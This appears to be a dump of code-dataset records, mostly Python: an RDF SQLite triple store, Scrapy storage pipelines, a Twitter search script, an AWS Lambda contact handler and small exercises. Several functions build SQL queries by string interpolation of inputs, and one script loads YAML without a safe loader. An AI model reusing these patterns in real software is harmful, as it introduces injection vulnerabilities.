self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n elif predicate:\n # select from asserted non rdf:type partition (optionally),\n # quoted partition (if context is speciied), and literal\n # partition (optionally)\n selects = []\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n clause_string, params = self.build_where_clause(\n \"quoted\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append((quoted_table, \"quoted\", clause_string, QUOTED_PARTITION))\n q = union_select(selects, distinct=True, selecttype=CONTEXT_SELECT)\n else:\n selects = [\n (asserted_type_table, \"typed\", \"\", ASSERTED_TYPE_PARTITION),\n (quoted_table, \"quoted\", \"\", QUOTED_PARTITION),\n (asserted_table, \"asserted\", \"\", ASSERTED_NON_TYPE_PARTITION),\n (literal_table, \"literal\", \"\", ASSERTED_LITERAL_PARTITION),\n ]\n q = union_select(selects, distinct=True, selecttype=CONTEXT_SELECT)\n\n self.execute_sql(c, self._normalize_sql_command(q), parameters)\n rt = c.fetchall()\n for context in [returned_tuple[0] for returned_tuple in rt]:\n yield URIRef(context)\n c.close()\n\n def _remove_context(self, identifier):\n \"\"\" \"\"\"\n # assert identifier\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n for table in [quoted_table, asserted_table, asserted_type_table, literal_table]:\n\n clause_string, params = self.build_context_clause(identifier, table)\n\n self.execute_sql(\n c,\n self._normalize_sql_command(\n f\"DELETE from {table} WHERE {clause_string}\"\n ),\n [p for p in params if p],\n )\n\n c.close()\n\n # Optional Namespace methods\n\n def subjects(self, predicate=None, obj=None):\n \"\"\"\n A generator of subjects with the given predicate and object.\n \"\"\"\n raise Exception(\"Not implemented\")\n\n # capable of taking a list of predicate terms instead of a single term\n def objects(self, subject=None, predicate=None):\n \"\"\"\n A generator of objects with the given subject and predicate.\n \"\"\"\n raise Exception(\"Not implemented\")\n\n # optimized interfaces (others)\n def predicate_objects(self, subject=None):\n \"\"\"\n A generator of (predicate, object) tuples for the given subject\n \"\"\"\n raise Exception(\"Not implemented\")\n\n def subject_objects(self, predicate=None):\n \"\"\"\n A generator of (subject, object) tuples for the given predicate\n \"\"\"\n raise Exception(\"Not implemented\")\n\n def subject_predicates(self, 
object=None):\n \"\"\"\n A generator of (subject, predicate) tuples for the given object\n \"\"\"\n raise Exception(\"Not implemented\")\n\n def value(\n self,\n subject,\n predicate=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\",\n object=None,\n default=None,\n any=False,\n ):\n \"\"\"\n Get a value for a subject/predicate, predicate/object, or\n subject/object pair -- exactly one of subject, predicate,\n object must be None. Useful if one knows that there may only\n be one value.\n\n It is one of those situations that occur a lot, hence this\n 'macro' like utility\n\n Parameters:\n -----------\n subject, predicate, object -- exactly one must be None\n default -- value to be returned if no values found\n any -- if True:\n return any value in the case there is more than one\n else:\n raise UniquenessError\"\"\"\n raise Exception(\"Not implemented\")\n\n # Namespace persistence interface implementation\n def bind(self, prefix, namespace, override=True):\n \"\"\" \"\"\"\n c = self._db.cursor()\n try:\n c.execute(\n \"INSERT INTO %s_namespace_binds VALUES ('%s', '%s')\"\n % (self._interned_id, prefix, namespace)\n )\n except Exception: # pragma: no cover\n pass\n c.close()\n\n # Namespace persistence interface implementation\n def unbind(self, prefix):\n \"\"\" \"\"\"\n c = self._db.cursor()\n try:\n c.execute(\n f\"\"\"DELETE FROM {self._interned_id}_namespace_binds WHERE prefix=\"{prefix}\";\"\"\"\n )\n except Exception: # pragma: no cover\n pass\n c.close()\n\n def prefix(self, namespace):\n \"\"\" \"\"\"\n c = self._db.cursor()\n c.execute(\n f'select prefix from {self._interned_id}_namespace_binds where uri = \"{namespace}\"'\n )\n rt = [returned_tuple[0] for returned_tuple in c.fetchall()]\n c.close()\n return rt and rt[0] or None\n\n def namespace(self, prefix):\n \"\"\" \"\"\"\n c = self._db.cursor()\n try:\n c.execute(\n f'select uri from {self._interned_id}_namespace_binds where prefix = \"{prefix}\"'\n )\n except Exception: # pragma: no cover\n return None\n rt = [returned_tuple[0] for returned_tuple in c.fetchall()]\n c.close()\n return rt and rt[0] or None\n\n def namespaces(self):\n \"\"\" \"\"\"\n c = self._db.cursor()\n c.execute(\n f\"select prefix, uri from {self._interned_id}_namespace_binds where 1;\"\n )\n\n rt = c.fetchall()\n c.close()\n for prefix, uri in rt:\n yield prefix, uri\n\n # Transactional interfaces\n def commit(self):\n \"\"\" \"\"\"\n self._db.commit()\n\n def rollback(self):\n \"\"\" \"\"\"\n self._db.rollback()\n\n\ntable_name_prefixes = [\n \"%s_asserted_statements\",\n \"%s_type_statements\",\n \"%s_quoted_statements\",\n \"%s_namespace_binds\",\n \"%s_literal_statements\",\n]\n\n\n# User-defined REGEXP operator\ndef regexp(expr, item):\n r = re.compile(expr)\n return r.match(item) is not None\n\n\n# Helper function for executing EXPLAIN on all dispatched SQL statements - for the pupose of analyzing\n# index usage\ndef query_analysis(query, store, cursor):\n cursor.execute(store._normalize_sql_command(\"explain \" + query))\n rt = cursor.fetchall()[0]\n (addr, opcode, p1, p2, p3, p4, p5, comment) = rt\n # if not _key:\n # assert jointype == \"ALL\"\n # if not hasattr(store, \"queryOptMarks\"):\n # store.queryOptMarks = {}\n # hits = store.queryOptMarks.get((\"FULL SCAN\", table), 0)\n # store.queryOptMarks[(\"FULL SCAN\", table)] = hits + 1\n\n # if not hasattr(store, \"queryOptMarks\"):\n # store.queryOptMarks = {}\n # hits = store.queryOptMarks.get((_key, table), 0)\n # store.queryOptMarks[(_key, table)] = hits + 1\n\n\nclass 
SQLiteStore(AbstractSQLStore):\n \"\"\"\n SQLite store formula-aware implementation. It stores its triples in the\n following partitions:\n\n - Asserted non rdf:type statements\n - Asserted rdf:type statements (in a table which models Class membership)\n The motivation for this partition is primarily query speed and\n scalability as most graphs will always have more rdf:type statements\n than others\n - All Quoted statements\n\n In addition it persists namespace mappings in a seperate table\n \"\"\"\n\n context_aware = True\n graph_aware = True\n formula_aware = True\n transaction_aware = True\n regex_matching = PYTHON_REGEX\n autocommit_default = False\n configuration = Literal(\"sqlite://\")\n\n def is_open(self):\n try:\n self._db.cursor()\n return True\n except Exception:\n return False\n\n def open(self, path, create=True):\n \"\"\"\n Opens the store specified by the configuration string. If\n create is True a store will be created if it does not already\n exist. If create is False and a store does not already exist\n an exception is raised. An exception is also raised if a store\n exists, but there is insufficient permissions to open the\n store.\"\"\"\n self.configuration = home = path\n if create:\n if os.path.exists(home):\n raise Exception(\n f\"sqlite3 database file {home} exists, please move it or delete it.\"\n )\n db = sqlite3.connect(home)\n c = db.cursor()\n c.execute(CREATE_ASSERTED_STATEMENTS_TABLE % (self._interned_id))\n c.execute(CREATE_ASSERTED_TYPE_STATEMENTS_TABLE % (self._interned_id))\n c.execute(CREATE_QUOTED_STATEMENTS_TABLE % (self._interned_id))\n c.execute(CREATE_NS_BINDS_TABLE % (self._interned_id))\n c.execute(CREATE_LITERAL_STATEMENTS_TABLE % (self._interned_id))\n self.tables = dict()\n for tablename, indices in [\n (\n \"%s_asserted_statements\",\n [\n (\"%s_A_termComb_index\", (\"termComb\",)),\n (\"%s_A_s_index\", (\"subject\",)),\n (\"%s_A_p_index\", (\"predicate\",)),\n (\"%s_A_o_index\", (\"object\",)),\n (\"%s_A_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_type_statements\",\n [\n (\"%s_T_termComb_index\", (\"termComb\",)),\n (\"%s_member_index\", (\"member\",)),\n (\"%s_klass_index\", (\"klass\",)),\n (\"%s_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_literal_statements\",\n [\n (\"%s_L_termComb_index\", (\"termComb\",)),\n (\"%s_L_s_index\", (\"subject\",)),\n (\"%s_L_p_index\", (\"predicate\",)),\n (\"%s_L_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_quoted_statements\",\n [\n (\"%s_Q_termComb_index\", (\"termComb\",)),\n (\"%s_Q_s_index\", (\"subject\",)),\n (\"%s_Q_p_index\", (\"predicate\",)),\n (\"%s_Q_o_index\", (\"object\",)),\n (\"%s_Q_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_namespace_binds\",\n [\n (\"%s_uri_index\", (\"uri\",)),\n ],\n ),\n ]:\n for indexname, columns in indices:\n c.execute(\n \"CREATE INDEX %s on %s (%s)\"\n % (\n indexname % self._interned_id,\n tablename % (self._interned_id),\n \", \".join(columns),\n )\n )\n self.tables[tablename.split(\"_\", 1)[1]] = tablename % (\n self._interned_id\n )\n c.close()\n db.commit()\n db.close()\n\n if os.path.exists(home):\n if self.autocommit_default:\n self._db = sqlite3.connect(home, isolation_level=None)\n else:\n self._db = sqlite3.connect(home)\n\n self._db.create_function(\"regexp\", 2, regexp)\n\n # Alternatively:\n # self._db.create_function('regexp', 2, lambda x, y: 1 if re.search(x, y) else 0)\n\n c = self._db.cursor()\n c.execute(\"SELECT * FROM sqlite_master WHERE type='table'\")\n tbls = [rt[1] for rt in c.fetchall()]\n c.close()\n for tn in [tbl 
% (self._interned_id) for tbl in table_name_prefixes]:\n if tn not in tbls:\n # The database exists, but one of the partitions doesn't exist\n return 0\n # Everything is there (the database and the partitions)\n self.graph_aware = True\n self.context_aware = True\n self.formula_aware = True\n return 1\n else:\n return -1\n\n def perform_query_analysis(self, query):\n query_analysis(query, self, self._db.cursor())\n\n def destroy(self, configuration=None):\n try:\n os.remove(self.configuration if configuration is None else configuration)\n except FileNotFoundError:\n pass\n\n # Where Clause utility functions\n\n # The predicate and object clause builders are modified in order to\n # optimize subjects and objects utility functions which can take lists as\n # their last argument (object, predicate - respectively)\n def build_term_clause(self, term, pos, tablename):\n tablename = f\"{pos}\" if tablename is None else f\"{tablename}.{pos}\"\n if isinstance(term, REGEXTerm):\n return f\" REGEXP (%s, {tablename})\", [term]\n elif isinstance(term, list):\n clausestrings = []\n paramstrings = []\n for tm in term:\n if isinstance(tm, REGEXTerm):\n clausestrings.append(f\" REGEXP (%s, {tablename})\")\n paramstrings.append(self.normalize_term(tm))\n elif isinstance(tm, Graph):\n if pos == \"predicate\":\n raise ValueError(\"Predicate cannot be a Graph!\")\n else:\n clausestrings.append(f\"{tablename} = %s\")\n paramstrings.append(self.normalize_term(tm.identifier))\n else:\n clausestrings.append(f\"{tablename} = %s\")\n paramstrings.append(self.normalize_term(tm))\n return \"(\" + \" or \".join(clausestrings) + \")\", paramstrings\n elif isinstance(term, Graph):\n if pos == \"predicate\":\n raise ValueError(\"Predicate cannot be a Graph!\")\n else:\n return f\"{tablename} = %s\", [self.normalize_term(term.identifier)]\n else:\n return (\n term is not None and f\"{tablename} = %s\",\n [term] or None,\n )\n\n def build_subject_clause(self, subject, tablename):\n return self.build_term_clause(subject, \"subject\", tablename)\n\n def build_predicate_clause(self, predicate, tablename):\n return self.build_term_clause(predicate, \"predicate\", tablename)\n\n def build_object_clause(self, obj, tablename):\n return self.build_term_clause(obj, \"object\", tablename)\n\n def build_context_clause(self, ctx, tablename):\n \"\"\"\n Return SQL clause:\n\n context and tablename: “kb_bec6803d52_quoted_statements.context=%s”\n\n None and tablename: “False”\n\n context and None: “context=%s”\n\n \"\"\"\n\n tablename = \"context\" if tablename is None else f\"{tablename}.context\"\n if ctx is not None:\n ctx = self.normalize_term(ctx)\n if isinstance(ctx, REGEXTerm):\n return f\" REGEXP (%s, {tablename})\", [ctx]\n else:\n return (\n ctx is not None and f\"{tablename} = %s\",\n [ctx] or None,\n )\n\n def build_type_clause(self, term, pos, tablename):\n tablename = f\"{pos}\" if tablename is None else f\"{tablename}.{pos}\"\n if isinstance(term, REGEXTerm):\n return f\" REGEXP (%s, {tablename})\", [term]\n elif isinstance(term, list):\n clausestrings = []\n paramstrings = []\n for tm in term:\n clausestrings.append(f\"{tablename} = %s\")\n if isinstance(tm, Graph):\n paramstrings.append(self.normalize_term(tm.identifier))\n else:\n paramstrings.append(self.normalize_term(tm))\n return \"(\" + \" or \".join(clausestrings) + \")\", paramstrings\n else:\n return term is not None and f\"{tablename} = %s\", [term] or None\n\n def build_type_member_clause(self, subj, tablename):\n return self.build_type_clause(subj, \"member\", 
tablename)\n\n def build_type_class_clause(self, obj, tablename):\n return self.build_type_clause(obj, \"klass\", tablename)\n\n def __iter__(self):\n def triples_to_quads():\n for (s, p, o), cg in self.triples((None, None, None), context=None):\n for c in cg:\n yield s, p, o, c.identifier if isinstance(c, Graph) else c\n\n return iter(triples_to_quads())\n\n def dumpdb(self):\n return \"\\n\".join(line for line in self._db.iterdump())\n\n def add_graph(self, graph):\n \"\"\"Non-op, contexts are implicit in the underpinning quadstore\"\"\"\n assert self._db.cursor(), \"The Store must be open.\"\n # Pending Dataset re-work\n if graph is None:\n pass\n elif isinstance(graph, Graph):\n for triple in list(graph):\n self.add(triple, context=self.identifier)\n elif isinstance(graph, (Graph, type(None))):\n raise TypeError(f\"\"\"graph identifier cannot be {type(graph)}\"\"\")\n\n def remove_graph(self, graph):\n assert self._db.cursor(), \"The Store must be open.\"\n if isinstance(graph, (Graph, type(None))):\n raise TypeError(f\"\"\"graph identifier cannot be {type(graph)}\"\"\")\n self.remove((None, None, None), graph)\n\n\nCREATE_ASSERTED_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_asserted_statements (\n subject text not NULL,\n predicate text not NULL,\n object text not NULL,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n UNIQUE(subject, predicate, object, context, termComb)\n )\"\"\"\n\nCREATE_ASSERTED_TYPE_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_type_statements (\n member text not NULL,\n klass text not NULL,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n UNIQUE(member, klass, context, termComb)\n )\"\"\"\n\nCREATE_LITERAL_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_literal_statements (\n subject text not NULL,\n predicate text not NULL,\n object text,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n objLanguage varchar(3),\n objDatatype text,\n UNIQUE(subject, predicate, object, context, termComb, objLanguage, objDatatype)\n )\"\"\"\n\nCREATE_QUOTED_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_quoted_statements (\n subject text not NULL,\n predicate text not NULL,\n object text,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n objLanguage varchar(3),\n objDatatype text,\n UNIQUE(subject, predicate, object, context, termComb, objLanguage, objDatatype)\n )\"\"\"\n\nCREATE_NS_BINDS_TABLE = \"\"\"\nCREATE TABLE %s_namespace_binds (\n prefix varchar(20) UNIQUE not NULL,\n uri text,\n PRIMARY KEY (prefix))\"\"\"\n","sub_path":"FuXi/sqlstore/sqlitestore.py","file_name":"sqlitestore.py","file_ext":"py","file_size_in_byte":67641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
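The SQLiteStore record above implements the rdflib Store interface across four SQL partitions (asserted, rdf:type, literal, quoted). A minimal usage sketch, assuming the add()/triples() methods defined earlier in that module follow standard rdflib Store conventions; the constructor argument, file path, and URIs are illustrative, not taken from the original file:

from rdflib import Graph, Literal, URIRef

store = SQLiteStore(identifier="demo")        # assumed Store-style constructor
store.open("/tmp/demo.sqlite", create=True)   # creates the four partition tables

g = Graph(store=store, identifier=URIRef("http://example.org/g"))
g.add((URIRef("http://example.org/alice"),
       URIRef("http://example.org/name"),
       Literal("Alice")))
store.commit()

print(len(g))          # dispatched to SQLiteStore.__len__ with the graph as context
for s, p, o in g:      # dispatched to SQLiteStore.triples
    print(s, p, o)

store.destroy()        # deletes /tmp/demo.sqlite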
+{"seq_id":"154609345","text":"class Solution:\n def longestPalindrome(self, s: str) -> int:\n palin_len={}\n odd=0\n even=0\n # Adding the string char and count to dictionary\n #Count is 0 if element is not present, else count is incremented by 1\n for i in range(len(s)):\n if(s[i] not in palin_len):\n palin_len[s[i]]=1\n else:\n palin_len[s[i]] += 1\n #If the value is even return value will be even value\n #Else sub 1 and add to palindrome sum\n \n for k in palin_len.keys():\n if(palin_len[k] % 2 ==0):\n even=even+ palin_len[k]\n else:\n even=even+ palin_len[k] -1\n #default odd len is 1 \n odd=1\n return odd+even\n \n \n \n\n","sub_path":"longpalindrome.py","file_name":"longpalindrome.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"11753477","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n#注意:只要涉及到持久化存储的相关的操作,必须要写在管道文件中\n#管道文件:需要接受爬虫文件提交过来的数据,并对数据进行持久化存储.(IO操作)\nimport pymysql\nfrom redis import Redis\nclass BossproPipeline(object):\n fp = None\n #只会被执行一次(开始爬虫的时候执行一次)\n def open_spider(self,spider):\n print('开始爬虫!!!')\n self.fp = open('./job.txt','w',encoding='utf-8')\n #爬虫文件没提交一次item,该方法会被调用一次\n def process_item(self, item, spider):\n self.fp.write(item['title']+\"\\t\"+item['salary']+'\\t'+item['company']+'\\n')\n return item\n def close_spider(self,spider):\n print('爬虫结束!!!')\n self.fp.close()\n#注意:默认情况下,管道机制并没有开启.需要手动在配置文件中进行开启\n\n#使用管道进行持久化存储的流程:\n#1.获取解析到的数据值\n#2.将解析的数据值存储到item对象(item类中进行相关属性的声明)\n#3.通过yild关键字将item提交到管道\n#4.管道文件中进行持久化存储代码的编写(process_item)\n#5.在配置文件中开启管道\n\nclass mysqlPipeLine(object):\n conn = None\n cursor = None\n def open_spider(self,spider):\n self.conn = pymysql.Connect(host='127.0.0.1', port=3306, user='root', password='', db='spider')\n print(self.conn)\n \n def process_item(self, item, spider):\n self.cursor = self.conn.cursor()\n sql = 'insert into boss values(\"%s\",\"%s\",\"%s\")'%(item['title'],item['salary'],item['company'])\n try:\n self.cursor.execute(sql)\n self.conn.commit()\n except Exception as e:\n print(e)\n self.conn.rollback()\n return item\n \n def close_spider(self,spider):\n self.cursor.close()\n self.conn.close()\n \nclass RedisPipeLine(object):\n conn = None\n def process_item(self, item, spider):\n dic = {\n 'title':item['title'],\n 'salary':item['salary'],\n 'company':item['company']\n }\n self.conn.lpush('jobInfo',dic)\n return item\n def open_spider(self, spider):\n self.conn = Redis(host='127.0.0.1',port=6380)\n print(self.conn)\n#[注意]一定要保证每一个管道类的process_item方法要有返回值","sub_path":"第10部分-爬虫/day133/课件/bossPro/bossPro/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"270792840","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport utool as ut\nfrom ibeis import constants as const\n\n# Inject utool functions\n(print, rrr, profile) = ut.inject2(__name__, '[species]')\n\nspecies_mapping = {\n 'bear_polar' : ('PB', 'Polar Bear'),\n 'building' : ('BUILDING', 'Building'),\n 'cheetah' : ('CHTH', 'Cheetah'),\n 'elephant_savanna' : ('ELEP', 'Elephant (Savanna)'),\n 'frog' : ('FROG', 'Frog'),\n 'giraffe_masai' : ('GIRM', 'Giraffe (Masai)'),\n 'giraffe_reticulated' : ('GIR', 'Giraffe (Reticulated)'),\n 'hyena' : ('HYENA', 'Hyena'),\n 'jaguar' : ('JAG', 'Jaguar'),\n 'leopard' : ('LOEP', 'Leopard'),\n 'lion' : ('LION', 'Lion'),\n 'lionfish' : ('LF', 'Lionfish'),\n 'lynx' : ('LYNX', 'Lynx'),\n 'nautilus' : ('NAUT', 'Nautilus'),\n 'other' : ('OTHER', 'Other'),\n 'rhino_black' : ('BRHINO', 'Rhino (Black)'),\n 'rhino_white' : ('WRHINO', 'Rhino (White)'),\n 'seal_saimma_ringed' : ('SEAL2', 'Seal (Siamaa Ringed)'),\n 'seal_spotted' : ('SEAL1', 'Seal (Spotted)'),\n 'snail' : ('SNAIL', 'Snail'),\n 'snow_leopard' : ('SLEOP', 'Snow Leopard'),\n 'tiger' : ('TIGER', 'Tiger'),\n 'toads_wyoming' : ('WYTOAD', 'Toad (Wyoming)'),\n 'water_buffalo' : ('BUFF', 'Water Buffalo'),\n 'wildebeest' : ('WB', 'Wildebeest'),\n 'wild_dog' : ('WD', 'Wild Dog'),\n 'whale_fluke' : ('WF', 'Whale Fluke'),\n 'whale_humpback' : ('HW', 'Humpback Whale'),\n 'whale_shark' : ('WS', 'Whale Shark'),\n 'zebra_grevys' : ('GZ', 'Zebra (Grevy\\'s)'),\n 'zebra_hybrid' : ('HZ', 'Zebra (Hybrid)'),\n 'zebra_plains' : ('PZ', 'Zebra (Plains)'),\n const.UNKNOWN : ('UNKNOWN', 'Unknown'),\n}\n","sub_path":"ibeis/species.py","file_name":"species.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"49401986","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport yaml\nfrom datetime import datetime\nfrom modules import tweet_handler, tweet_search, webhook\nfrom queue import Queue\n\n\ndef _load_configs(spath):\n tokens_yml = os.path.join(spath, 'settings/tokens.yml')\n search_yml = os.path.join(spath, 'settings/search_setting.yml')\n webhook_yml = os.path.join(spath, 'settings/webhook_setting.yml')\n try:\n with open(tokens_yml, 'r') as f:\n t = yaml.load(f)\n tokens = [t['c_key'], t['c_secret'], t['a_token'], t['a_secret']]\n with open(search_yml, 'r') as s:\n search_settings = yaml.load(s)\n with open(webhook_yml, 'r') as w:\n webhook_settings = yaml.load(w)\n except IOError:\n print('setting yml file is not sufficient. Abort...')\n sys.exit()\n\n return tokens, search_settings, webhook_settings\n\n\ndef search_tweets():\n this_script = os.path.abspath(os.path.dirname(__file__))\n tokens, settings, webhook_settings = _load_configs(this_script)\n hook = webhook.Webhook(webhook_settings)\n\n q = Queue()\n search = tweet_search.GetTwJson(tokens=tokens,\n keyword=settings['argument'], queue=q)\n handler = tweet_handler.TweetHandler(queue=q, webhook=hook,\n logfile=settings['logfile'])\n handler.start()\n\n search.from_keywords()\n q.join()\n\n logpath = os.path.join(this_script, 'logs/run.log')\n with open(logpath, 'a+') as f:\n f.write(\"===== run at {}\\n\".format(str(datetime.now())))\n f.write(\"ignored : {}\\n\".format(str(len(handler.ignored))))\n f.write(\"posted : {}\\n\".format(str(len(handler.posted))))\n\nif __name__ == '__main__':\n search_tweets()\n","sub_path":"ego_start.py","file_name":"ego_start.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"262940130","text":"#!/usr/bin/env python\n\n\"\"\"\nTest URL:\n https://geodeepdive.org/api/snippets?full_results=true&inclusive=true&term=CUAHSI\n\n\"\"\"\n\nimport sys\nimport json\nimport pandas\nimport requests\nimport argparse\n\nresults = []\n\n\n\ndef get_results(url):\n \"\"\"\n Recursive function that queries the geodeepdive dive API\n for all term matches and returns\n \"\"\"\n\n # make request\n r = requests.get(url)\n\n if r.status_code == 200:\n # load the data\n data = json.loads(r.content)\n\n res = data['success']['data']\n\n # get the next page\n if data['success']['next_page'].strip() != '':\n next_page = data['success']['next_page']\n\n res.extend(get_results(next_page))\n\n return res\n else:\n return []\n\n\n#def search_gdd(terms):\n#\n# base = 'https://geodeepdive.org/api/snippets'\n#\n## full_results=true&inclusive=true&min_published=2020-01-01&clean\n# params = {'term': '',\n# 'full_results': True,\n# 'inclusive': True\n# }\n#\n# for term in terms:\n# params['term'] = term\n#\n# # make request\n# r = requests.get(base, params=params)\n#\n# if r.status_code == 200:\n# # load the data\n# data = json.loads(r.content)\n# \n# results.append(pandas.from_dict(data['success']['data']))\n#\n# # get the next page\n# next_page = data['success']['next_page']\n# # todo call recursively\n#\n# import pdb; pdb.set_trace()\n# else:\n# print(r.status_code)\n# break\n#\n\nif __name__ == '__main__':\n\n\n p = argparse.ArgumentParser()\n p.add_argument('-f',\n default='',\n help='path to list of search terms')\n p.add_argument('-t',\n default='',\n nargs='+',\n help='space separated list of search terms')\n\n args = p.parse_args()\n\n # exit early if -f and -t are not provided\n if not (args.f or args.t):\n print('Must supply either -f or -t argument')\n p.print_usage()\n sys.exit(1)\n\n if args.f:\n with open(args.f, 'r') as f:\n terms = [l.strip() for l in f.readlines()]\n elif args.t:\n terms = args.t\n\n # run search\n dfs = []\n root_url = 'https://geodeepdive.org/api/snippets'\n for term in terms:\n\n print(f'Searching term: {term}... ', end='', flush=True)\n\n # build url\n params = dict(full_results=True,\n inclusive=True,\n term=term)\n s = requests.Session()\n p = requests.Request('GET', root_url,\n params=params).prepare()\n hits = get_results(p.url)\n\n # add the search term to the results\n df = pandas.DataFrame(hits)\n df['search_term'] = term\n\n dfs.append(df)\n\n print(f'{len(df)} matches')\n\n # merge all dataframes\n merged = pandas.concat(dfs)\n merged.reset_index(inplace=True)\n\n merged = merged.groupby('doi').agg({\n 'pubname': 'first',\n 'publisher': 'first',\n '_gddid': 'first',\n 'title': 'first',\n 'coverDate': 'first',\n 'URL': 'first',\n 'authors': 'first',\n 'highlight': 'sum',\n 'search_term': list})\n# cols = ['pubname', 'publisher',\n# '_gddid', 'title', 'doi', 'coverDate',\n# 'URL', 'authors', 'highlight', 'search_term']\n# \n# merged.drop(merged.columns.difference(cols), 1, inplace=True)\n\n # save merged dataframe to csv\n merged.to_csv('gdd_matches.csv')\n\n\n","sub_path":"scripts/gdd-references/get_gdd_references.py","file_name":"get_gdd_references.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178794333","text":"from __future__ import print_function\n\nimport pymysql\nimport config\nimport json\nimport boto3\nimport traceback\n\nlambda_client = boto3.client('lambda')\n\n\ndef lambda_handler(event, context):\n response = {}\n\n try:\n conn = pymysql.connect(\n host=config.rds_host,\n port=config.rds_port,\n user=config.rds_user_name,\n passwd=config.rds_user_password,\n db=config.rds_db_name,\n charset='utf8mb4'\n )\n\n # Check restaurants in same city/state.\n with conn.cursor() as cur:\n query = \"INSERT INTO contact_submissions (first_name, last_name, email, phone, message) \" \\\n \"VALUES (%s, %s, %s, %s, %s);\"\n cur.execute(query, (str(event['first_name']),\n str(event['last_name']),\n str(event['email']),\n str(event['phone']),\n str(event['message'])))\n conn.commit()\n\n response['success'] = 'true'\n except Exception as e:\n print(e)\n lambda_client.invoke(FunctionName=config.error_handler,\n InvocationType='Event',\n LogType='None',\n Payload=json.dumps({\n \"function_name\": context.function_name,\n \"args\": e.args,\n \"message\": traceback.format_exc()\n }))\n response['error'] = [\n {\n 'error': e.message,\n 'message': 'An error occurred. Please try again later.'\n }\n ]\n finally:\n conn.close()\n\n return response\n","sub_path":"handlers/contact/POST/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"193513612","text":"## Compute the probability of 7 occurrences of no hitters in baseball games given\n## a rate 251/115 in a set of 10000 samples \n\n# Draw 10,000 samples out of Poisson distribution: n_nohitters\nn_nohitters = np.random.poisson(251/115, size=10000)\n\n# Compute number of samples that are seven or greater: n_large\nn_large = np.sum(n_nohitters>=7)\n\n# Compute probability of getting seven or more: p_large\np_large = n_large/10000\n\n# Print the result\nprint('Probability of seven or more no-hitters:', p_large)\n","sub_path":"statistical_thinking_in_python_part1/poisson_distributions.py","file_name":"poisson_distributions.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
